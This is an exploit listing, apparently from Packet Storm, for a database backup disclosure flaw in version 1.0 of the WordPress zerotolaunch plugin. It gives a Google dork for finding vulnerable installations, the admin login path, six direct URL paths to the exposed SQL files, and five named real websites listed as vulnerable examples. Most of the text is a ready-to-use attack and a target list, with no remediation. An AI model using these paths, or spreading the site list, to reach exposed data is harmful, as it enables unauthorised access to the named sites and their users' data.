WordPress zerotolaunch 1.0 Database Disclosure

2018-12-04T00:00:00
ID PACKETSTORM:150593
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-04T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress zerotolaunch Plugins 1.0 Database Backup  
Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 03/02/2018  
# Vendor Homepage : wordpress.org  
+ themesinfo.com/wordpress-plugins/wordpress-zerotolaunch-plugin-djjx  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/zerotolaunch/''  
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110216  
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2265  
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31544  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql  
  
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
ilovevitiligo.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
[+]  
vidauthority.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
[+]  
tershaandmatt.com/blog/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
[+]  
redeyedistrict.com/zenfen/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
[+]  
creativelifework.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`